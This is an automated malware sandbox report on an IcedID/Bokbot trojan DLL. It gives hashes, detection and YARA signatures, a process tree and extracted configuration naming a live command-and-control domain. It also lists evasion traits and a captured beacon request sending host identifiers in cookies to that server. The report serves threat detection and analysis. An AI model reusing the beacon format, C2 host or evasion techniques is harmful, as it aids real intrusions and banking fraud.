
Windows Analysis Report
y2D56.tmp.dll

Overview

General Information

Sample Name: y2D56.tmp.dll
Analysis ID: 682775
MD5: 363777daf36e9534762d30bd4bf22c74
SHA1: ea94d9afd355dd23a069f21b3562d85a4266da4f
SHA256: 8cd135e5b49d16aceb7665b6316cd4df2e132ef503ff0af51c080bad7010efd6
Tags: Bokbot, DLL, exe, IcedID

Detection

IcedID
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected IcedID
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
PE file does not import any functions
Yara signature match
PE file contains an invalid checksum
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers

Classification

  • System is w10x64
  • loaddll64.exe (PID: 3960 cmdline: loaddll64.exe "C:\Users\user\Desktop\y2D56.tmp.dll" MD5: 4E8A40CAD6CCC047914E3A7830A2D8AA)
    • cmd.exe (PID: 1944 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 2700 cmdline: rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 4956 cmdline: rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,JfUksQmDGYQRSQfC MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 2264 cmdline: rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,MVeMOgOlu MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 4040 cmdline: rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,OnqcowdLVOpj MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 5672 cmdline: rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",JfUksQmDGYQRSQfC MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 5652 cmdline: rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",MVeMOgOlu MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 3976 cmdline: rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",OnqcowdLVOpj MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 3516 cmdline: rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",aXXRQNg MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 3568 cmdline: rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",agetCYHzlW MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
{"Campaign ID": 3570055661, "C2 url": "alexbionka.com"}
Source | Rule | Description | Author | Strings (5 of 8 entries shown)
    Source: 00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_IcedID_1 | Description: Yara detected IcedID | Author: Joe Security
    Source: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp | Rule: Windows_Trojan_IcedID_11d24d35 | Description: unknown | Author: unknown
    • 0x3d0:$a2: loader_dll_64.dll
    Source: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp | Rule: Windows_Trojan_IcedID_0b62e783 | Description: unknown | Author: unknown
    • 0x876:$a: 89 44 95 E0 83 E0 07 8A C8 42 8B 44 85 E0 D3 C8 FF C0 42 89 44
    Source: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp | Rule: Windows_Trojan_IcedID_91562d18 | Description: unknown | Author: unknown
    • 0x1bc4:$a: 44 8B 4C 19 2C 4C 03 D6 74 1C 4D 85 C0 74 17 4D 85 C9 74 12 41
    Source: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp | Rule: Windows_Trojan_IcedID_48029e37 | Description: unknown | Author: unknown
    • 0x1190:$a: 48 C1 E3 10 0F 31 48 C1 E2 20 48 0B C2 0F B7 C8 48 0B D9 8B CB 83 E1
    Source | Rule | Description | Author | Strings (5 of 14 entries shown)
    Source: 3.2.rundll32.exe.212802e97b8.1.unpack | Rule: MAL_IcedID_GZIP_LDR_202104 | Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Author: Thomas Barabosch, Telekom Security
    • 0x1bd0:$internal_name: loader_dll_64.dll
    • 0x1f08:$string6: WINHTTP.dll
    • 0x1bf4:$string7: DllRegisterServer
    • 0x1c06:$string8: PluginInit
    Source: 3.2.rundll32.exe.212802e97b8.1.unpack | Rule: Windows_Trojan_IcedID_11d24d35 | Description: unknown | Author: unknown
    • 0x1bd0:$a2: loader_dll_64.dll
    Source: 3.2.rundll32.exe.212802e97b8.1.unpack | Rule: Windows_Trojan_IcedID_91562d18 | Description: unknown | Author: unknown
    • 0x13c4:$a: 44 8B 4C 19 2C 4C 03 D6 74 1C 4D 85 C0 74 17 4D 85 C9 74 12 41
    Source: 3.2.rundll32.exe.212802e97b8.1.unpack | Rule: Windows_Trojan_IcedID_48029e37 | Description: unknown | Author: unknown
    • 0x990:$a: 48 C1 E3 10 0F 31 48 C1 E2 20 48 0B C2 0F B7 C8 48 0B D9 8B CB 83 E1
    Source: 3.2.rundll32.exe.180000000.0.unpack | Rule: MAL_IcedID_GZIP_LDR_202104 | Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads | Author: Thomas Barabosch, Telekom Security
    • 0x27d0:$internal_name: loader_dll_64.dll
    • 0x3198:$string0: _gat=
    • 0x3048:$string1: _ga=
    • 0x30a0:$string2: _gid=
    • 0x3118:$string3: _u=
    • 0x303a:$string4: _io=
    • 0x3054:$string5: GetAdaptersInfo
    • 0x2b08:$string6: WINHTTP.dll
    • 0x27f4:$string7: DllRegisterServer
    • 0x2806:$string8: PluginInit
    • 0x3134:$string9: POST
    No Sigma rule has matched
    No Snort rule has matched



    AV Detection

    Source: y2D56.tmp.dll | Avira: detected
    Source: y2D56.tmp.dll | Virustotal: Detection: 14%
    Source: alexbionka.com | Avira URL Cloud: Label: malware
    Source: http://alexbionka.com/QpkO | Avira URL Cloud: Label: malware
    Source: http://alexbionka.com/ | Avira URL Cloud: Label: malware
    Source: http://alexbionka.com/UN | Avira URL Cloud: Label: malware
    Source: http://alexbionka.com:80/h | Avira URL Cloud: Label: malware
    Source: alexbionka.com | Virustotal: Detection: 9%
    Source: Yara match | File source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPE
    Source: Yara match | File source: 00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 2700, type: MEMORYSTR
    Source: Yara match | File source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE
    Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: IcedID {"Campaign ID": 3570055661, "C2 url": "alexbionka.com"}
    Source: y2D56.tmp.dll | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

    Networking

    Source: C:\Windows\System32\rundll32.exe | Network Connect: 64.227.108.27 80
    Source: C:\Windows\System32\rundll32.exe | Domain query: alexbionka.com
    Source: Malware configuration extractor | URLs: alexbionka.com
    Source: Joe Sandbox View | ASN Name: DIGITALOCEAN-ASNUS
    Source: global traffic | HTTP traffic detected:
        GET / HTTP/1.1
        Connection: Keep-Alive
        Cookie: __gads=3570055661:1:4060:115; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333734363533:616C666F6E73:30394232333031304432353637323145; __io=0; _gid=67AFEDD28876
        Host: alexbionka.com
    Source: Joe Sandbox View | IP Address: 64.227.108.27
    Source: global traffic | HTTP traffic detected:
        HTTP/1.1 404 Not Found
        Server: nginx
        Date: Thu, 11 Aug 2022 22:28:22 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
        Data Ascii: 10c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at alexbionka.com Port 80</address></body></html>0
    Source: rundll32.exe, 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://alexbionka.com/
    Source: rundll32.exe, 00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://alexbionka.com/QpkO
    Source: rundll32.exe, 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://alexbionka.com/UN
    Source: rundll32.exe, 00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://alexbionka.com:80/h
    Source: unknown | DNS traffic detected: queries for: alexbionka.com

    E-Banking Fraud

    Source: Yara match | File source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPE
    Source: Yara match | File source: 00000003.00000002.432152014.00000212820D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 2700, type: MEMORYSTR
    Source: Yara match | File source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE

    System Summary

    Source: 3.2.rundll32.exe.212802e97b8.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
    Source: 3.2.rundll32.exe.212802e97b8.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
    Source: 3.2.rundll32.exe.212802e97b8.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects IceID / Bokbot variants Author: ditekSHen
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects IceID / Bokbot variants Author: ditekSHen
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
    Source: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
    Source: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
    Source: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
    Source: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
    Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
    Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_0b62e783 Author: unknown
    Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_91562d18 Author: unknown
    Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_48029e37 Author: unknown
    Source: Process Memory Space: rundll32.exe PID: 2700, type: MEMORYSTR | Matched rule: Windows_Trojan_IcedID_11d24d35 Author: unknown
    Source: y2D56.tmp.dll | Static PE information: No import functions for PE file found
    Source: 3.2.rundll32.exe.212802e97b8.1.unpack, type: UNPACKEDPE | Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
    Source: 3.2.rundll32.exe.212802e97b8.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: 3.2.rundll32.exe.212802e97b8.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
    Source: 3.2.rundll32.exe.212802e97b8.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
    Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
    Source: 3.2.rundll32.exe.212802e97b8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
    Source: 00000003.00000002.431671660.0000000180004000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
    Source: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
    Source: 00000003.00000002.431665923.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
    Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
    Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
    Source: 00000003.00000002.431790390.00000212802D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
    Source: Process Memory Space: rundll32.exe PID: 2700, type: MEMORYSTR | Matched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_00000001800024FC
    Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_00007FFA65C55FE6 NtCreateSection,NtMapViewOfSection
    Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_00007FFA65C55FF9 NtCreateSection
    Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
    Source: y2D56.tmp.dll | Virustotal: Detection: 14%
    Source: y2D56.tmp.dll | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\System32\loaddll64.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,JfUksQmDGYQRSQfC
    Source: unknown | Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\y2D56.tmp.dll"
    Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",#1
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",#1
    Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,MVeMOgOlu
    Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\y2D56.tmp.dll,OnqcowdLVOpj
    Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",JfUksQmDGYQRSQfC
    Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",MVeMOgOlu
    Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",OnqcowdLVOpj
    Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",aXXRQNg
    Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\y2D56.tmp.dll",agetCYHzlW
    Source: classification engine | Classification label: mal100.troj.evad.winDLL@21/0@1/1
    Source: C:\Windows\System32\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
    Source: y2D56.tmp.dll | Static PE information: Image base 0x180000000 > 0x60000000
    Source: y2D56.tmp.dll | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
    Source: y2D56.tmp.dll | Static PE information: real checksum: 0x59d91 should be: 0x654aa
    Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_00007FFA65C58BC2 push rax; ret 3_2_00007FFA65C58BDE
    Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_00007FFA65C5610E push rdx; ret 3_2_00007FFA65C5611B
